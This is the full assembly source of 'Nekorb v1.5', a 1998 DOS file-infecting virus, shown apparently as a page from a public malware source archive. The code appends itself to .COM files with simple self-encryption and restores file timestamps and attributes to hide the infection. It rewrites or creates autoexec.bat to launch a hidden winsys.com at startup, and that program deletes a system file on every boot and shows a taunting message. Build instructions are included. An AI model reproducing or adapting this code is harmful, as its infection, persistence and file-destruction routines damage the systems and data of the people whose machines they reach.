mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
346 lines
18 KiB
NASM
346 lines
18 KiB
NASM
|
; ------------------------------------------------------------------------- ;
|
||
|
; Nekorb v1.5 coded by KilJaeden of the Codebreakers 1998 ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; Description: `-------------------| Started: 10/06/98 | Finished: 11/06/98 ;
|
||
|
; `-------------------^------------------- ;
|
||
|
; v1.0 - start with a simple *.com appender | Size: 824 ;
|
||
|
; v1.1 - time / date restoration `---------- ;
|
||
|
; v1.2 - add XOR,NEG,NOT,ROR encryption and directory changing ;
|
||
|
; v1.3 - infects files with any attributes (readonly/hidden/sys) ;
|
||
|
; v1.4 - saves / restores file attributes now ;
|
||
|
; v1.5 - the craziest payload I have ever done... how to explain this...! ;
|
||
|
; - 1: infects all the .coms it can, and then jumps to c:\ ;
|
||
|
; - 2: finds the autoexec.bat file, if there is none, one is created ;
|
||
|
; - 3: infects either the old, or the new, autoexec.bat file replacing ;
|
||
|
; - the first line of it, so it executes a .com everytime the ;
|
||
|
; - computer is started up! read only and hides the autoexec.bat ;
|
||
|
; - 4: creates the new .com that the autoexec.bat runs on startup ;
|
||
|
; - 5: that new .com jumps to the \windows\system directory, and ;
|
||
|
; - deletes one file, prints a message, and waits for the infected ;
|
||
|
; - user to press any key (just to make sure they see us) ;
|
||
|
; - the new .com is made read only / hidden as well ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; ----------------------> For Christine Moore <---------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; to compile ::] tasm nekorb.asm ;
|
||
|
; to link :::::] tlink /t nekorb.obj ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
code segment ; name our segment 'code'
|
||
|
assume cs:code,ds:code ; assign CS and DS to code
|
||
|
org 100h ; this be a .com file
|
||
|
|
||
|
blank: db 0e9h,0,0 ; define the blank jump
|
||
|
start: call delta ; push IP on to stack
|
||
|
delta: pop bp ; pop into BP
|
||
|
sub bp,offset delta ; get the delta offset
|
||
|
|
||
|
encst: jmp not1st ; jump to not1st (overwritten)
|
||
|
lea si,[bp+encd] ; points to encrypted area start
|
||
|
mov di,si ; move the value into DI
|
||
|
call encr ; call the de/encryption routine
|
||
|
jmp encd ; jump to start of encrypted stuff
|
||
|
|
||
|
encr: lodsb ; load a byte
|
||
|
not al ; encryptin 1
|
||
|
ror al,4 ; encryptin 2
|
||
|
neg al ; encryptin 3
|
||
|
xor al,byte ptr [bp+key] ; encryptin 4 -final-
|
||
|
neg al ; unencrypt 3
|
||
|
ror al,4 ; unencrypt 2
|
||
|
not al ; unencrypt 1
|
||
|
stosb ; stores the byte
|
||
|
loop encr ; does all the bytes
|
||
|
ret ; returns from call
|
||
|
|
||
|
key db 0 ; our key
|
||
|
|
||
|
encd: lea si,[bp+buffer] ; three bytes to restore
|
||
|
mov di,100h ; load di with 100h
|
||
|
push di ; save this for the 'retn'
|
||
|
movsw ; move two bytes
|
||
|
movsb ; move one byte
|
||
|
|
||
|
lea dx,[bp+offset dta] ; new DTA address
|
||
|
mov ah,1ah ; move the dta
|
||
|
int 21h ; DTA is moved
|
||
|
|
||
|
first: mov ah,4eh ; find the first file
|
||
|
lea dx,[bp+comfile] ; looking for *.c*
|
||
|
mov cx,7 ; with these attributes
|
||
|
|
||
|
next: int 21h ; find the first .com
|
||
|
jnc infect ; found one? infect it
|
||
|
mov ah,3bh ; change directory
|
||
|
lea dx,[bp+updir] ; load the .. string
|
||
|
int 21h ; now up a directory
|
||
|
jnc first ; jump to first
|
||
|
jmp pload ; hit root? do our payload
|
||
|
|
||
|
infect: lea dx,[bp+offset dta+1eh] ; get the file info
|
||
|
mov ax,4300h ; get file attributes
|
||
|
int 21h ; we have them now
|
||
|
push cx ; save value #1
|
||
|
push dx ; save value #2
|
||
|
push ds ; save value #3
|
||
|
|
||
|
mov ax,4301h ; set file attributes
|
||
|
xor cx,cx ; to none at all
|
||
|
int 21h ; ready for infection
|
||
|
|
||
|
call open ; open the file
|
||
|
|
||
|
mov ax,5700h ; get time / date stamps
|
||
|
int 21h ; get them now
|
||
|
push dx ; save value #4
|
||
|
push cx ; save value #5
|
||
|
|
||
|
mov ah,3fh ; read record function
|
||
|
lea dx,[bp+buffer] ; to the buffer
|
||
|
mov cx,3 ; three bytes
|
||
|
int 21h ; read those bytes
|
||
|
|
||
|
mov ax,word ptr [bp+dta+1ah] ; move the file size into AX
|
||
|
mov cx,word ptr [bp+buffer+1] ; move the buffer + 1 into cx
|
||
|
add cx,finish-start+3 ; add virus size + jump
|
||
|
cmp ax,cx ; compare the two
|
||
|
jz shutup ; if equal close the file
|
||
|
cmp ax,1000 ; compare file size with 1kb
|
||
|
jb shutup ; file is too small, close it up
|
||
|
cmp ax,62000 ; compare file size with 62kb
|
||
|
ja shutup ; file is too big, close it up
|
||
|
|
||
|
sub ax,3 ; get jump to virus body size
|
||
|
mov word ptr [bp+newjump+1],ax ; write this as our jump
|
||
|
|
||
|
mov al,00h ; start of file
|
||
|
call scan ; scan to start of file
|
||
|
|
||
|
mov ah,40h ; write to file
|
||
|
lea dx,[bp+newjump] ; write this
|
||
|
mov cx,3 ; # of bytes to write
|
||
|
int 21h ; write it now
|
||
|
|
||
|
mov al,02h ; end of file
|
||
|
call scan ; scan to end of file
|
||
|
|
||
|
in al,40h ; get a random value
|
||
|
mov byte ptr [bp+key],al ; save it as our key
|
||
|
|
||
|
mov ah,40h ; write to file
|
||
|
lea dx,[bp+start] ; where to start writting
|
||
|
mov cx,encd-start ; # of bytes to write
|
||
|
int 21h ; write the non-encrypted stuff
|
||
|
|
||
|
lea di,[bp+finish] ; load DI with end address
|
||
|
push di ; save value #6
|
||
|
lea si,[bp+encd] ; load SI with start address
|
||
|
mov cx,finish-encd ; # of bytes between the two
|
||
|
push cx ; save value #7
|
||
|
call encr ; call the encryption routine
|
||
|
|
||
|
mov ah,40h ; write to file
|
||
|
pop cx ; saved value #7
|
||
|
pop dx ; saved value #6
|
||
|
int 21h ; write those bytes
|
||
|
|
||
|
shutup: mov ax,5701h ; set time / date
|
||
|
pop cx ; from saved value #5
|
||
|
pop dx ; from saved value #4
|
||
|
int 21h ; time / date restored
|
||
|
|
||
|
mov ax,4301h ; set file attributes
|
||
|
pop ds ; from saved value #3
|
||
|
pop dx ; from saved value #2
|
||
|
pop cx ; from saved value #1
|
||
|
int 21h ; set them now
|
||
|
|
||
|
call close ; close the file
|
||
|
mov ah,4fh ; find next file
|
||
|
jmp next ; jump to next
|
||
|
|
||
|
exit: mov dx,80h ; old address of DTA
|
||
|
mov ah,1ah ; restore to original location
|
||
|
int 21h ; DTA is back to original location
|
||
|
retn ; return control to host
|
||
|
|
||
|
; ---------------------------( The Payload )------------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
pload: mov ah,0eh ; change drive
|
||
|
mov dl,2 ; to drive c:\
|
||
|
int 21h ; now in c:\
|
||
|
mov ah,3bh ; change directory
|
||
|
lea dx,[bp+rootdir] ; to the root directory
|
||
|
int 21h ; change now
|
||
|
|
||
|
find: mov ah,4eh ; find first file
|
||
|
lea dx,[bp+autoexe] ; named 'autoexec.bat'
|
||
|
mov cx,7 ; possible attributes
|
||
|
int 21h ; find it now
|
||
|
jnc infkt ; found it? infect it now
|
||
|
|
||
|
mov ah,3ch ; make a file
|
||
|
lea dx,[bp+autoexe] ; named 'autoexec.bat'
|
||
|
xor cx,cx ; normal attributes
|
||
|
int 21h ; make it now
|
||
|
jmp find ; and try again
|
||
|
|
||
|
infkt: lea dx,[bp+offset dta+1eh] ; get the file info
|
||
|
push dx ; save value #8
|
||
|
mov ax,4301h ; set file attributes
|
||
|
xor cx,cx ; to none at all
|
||
|
int 21h ; set them now
|
||
|
call open ; open the file
|
||
|
|
||
|
mov ah,40h ; write to file
|
||
|
lea dx,[bp+newline] ; write the new line
|
||
|
mov cx,13 ; this many bytes
|
||
|
int 21h ; write to file
|
||
|
|
||
|
pop dx ; from saved value #8
|
||
|
mov ax,4301h ; set file attributes
|
||
|
mov cx,3 ; read only / hidden
|
||
|
int 21h ; set them now
|
||
|
|
||
|
call close ; close the autoexec.bat
|
||
|
|
||
|
mov ah,3ch ; create a file
|
||
|
lea dx,[bp+pldfile] ; with this name
|
||
|
push dx ; save value #9
|
||
|
xor cx,cx ; with no attributes
|
||
|
int 21h ; create it now
|
||
|
|
||
|
mov ah,4eh ; find the first file
|
||
|
pop dx ; from saved value #9
|
||
|
mov cx,7 ; with these possible attributes
|
||
|
int 21h ; find it now
|
||
|
|
||
|
lea dx,[bp+offset dta+1eh] ; get the file name info
|
||
|
push dx ; save value #10
|
||
|
call open ; open the file
|
||
|
|
||
|
mov ah,40h ; write to file
|
||
|
lea dx,[bp+pstrt] ; write from here
|
||
|
mov cx,pend-pstrt ; this # of bytes
|
||
|
int 21h ; write them now
|
||
|
|
||
|
pop dx ; from saved value #10
|
||
|
mov ax,4301h ; set file attributes
|
||
|
mov cx,3 ; read only / hidden
|
||
|
int 21h ; set them now
|
||
|
|
||
|
call close ; close winsys.com
|
||
|
jmp exit ; end the virus
|
||
|
|
||
|
; ---------------------( Remotely Called Procedures )---------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
close: mov ah,3eh ; close file
|
||
|
int 21h ; close it now
|
||
|
ret
|
||
|
|
||
|
open: mov ax,3d02h ; open the file
|
||
|
int 21h ; file is opened
|
||
|
xchg bx,ax ; move the info
|
||
|
ret ; return from call
|
||
|
|
||
|
scan: mov ah,42h ; scan function
|
||
|
xor cx,cx ; cx must be 0
|
||
|
cwd ; likewize for DX
|
||
|
int 21h ; scan through file
|
||
|
ret ; return from call
|
||
|
|
||
|
; -----------------------( The Payload Data Area )------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
pstrt: db 0e9h,0,0 ; need all this again
|
||
|
call paydel ; push IP on to stack
|
||
|
paydel: pop bp ; pop it into bp
|
||
|
sub bp,offset paydel ; get 2nd delta offset
|
||
|
|
||
|
mov ah,3bh ; change directory
|
||
|
lea dx,[bp+winsys] ; \windows\system
|
||
|
int 21h ; go there now
|
||
|
|
||
|
mov ah,4eh ; find first file
|
||
|
lea dx,[bp+anyfile] ; with any name *.*
|
||
|
mov cx,7 ; with these possible attributes
|
||
|
int 21h ; find one now
|
||
|
|
||
|
mov ah,41h ; delete a file
|
||
|
mov dx,9eh ; with this name
|
||
|
int 21h ; delete it
|
||
|
|
||
|
mov ah,3bh ; change directory
|
||
|
lea dx,[bp+root] ; back to the root dir
|
||
|
int 21h ; go there now
|
||
|
|
||
|
mov ah,09h ; print a message
|
||
|
lea dx,[bp+paymsg] ; this message
|
||
|
int 21h ; print it to the screen
|
||
|
mov ah,00h ; wait for keypress
|
||
|
int 16h ; let them seeeeee hehehe
|
||
|
int 20h ; end this program
|
||
|
anyfile db '*.*',0 ; find *.*
|
||
|
winsys db "\windows\system",0 ; define directory to change to
|
||
|
root db "\",0 ; change to the root dir
|
||
|
paymsg db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db '',10,13 ; so they don't see winsys.com exec
|
||
|
db 'Infected by Nekorb coded by KilJaeden of the Codebreakers on 10/06/98 - 11/06/98',10,13
|
||
|
db '::Each time you start your computer, an innocent file is sacrificed to my god.::',10,13,'$'
|
||
|
pend:
|
||
|
|
||
|
; --------------------------( The Data Area )------------------------------ ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
newline db '.\winsys.com',10,13,'$'
|
||
|
updir db "..",0 ; define the .. string
|
||
|
comfile db "*.com",0 ; define the *.c* string
|
||
|
autoexe db 'autoexec.bat',0 ; name of file to find
|
||
|
buffer db 0cdh,20h,0 ; terminates 1st gen
|
||
|
rootdir db "\",0 ; change to the root dir
|
||
|
pldfile db 'winsys.com',0 ; the name for our new .com
|
||
|
newjump db 0e9h,0,0 ; overwriten 1st gen
|
||
|
dta db 43 dup (?) ; space for the new DTA
|
||
|
finish label near ; an offset label
|
||
|
|
||
|
; ---------------------( Not Saved / Not Encrypted )----------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
not1st: lea di,[bp+encst] ; where to move the bytes
|
||
|
lea si,[bp+new] ; move these bytes
|
||
|
movsw ; move two bytes
|
||
|
movsb ; move one more
|
||
|
jmp encd ; jump to encrypted area
|
||
|
|
||
|
new: mov cx,finish-encd ; this will overwrite the jump
|
||
|
|
||
|
; -----------------------------( The End )--------------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
code ends ; end code segment
|
||
|
end blank ; end / where to start
|
||
|
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|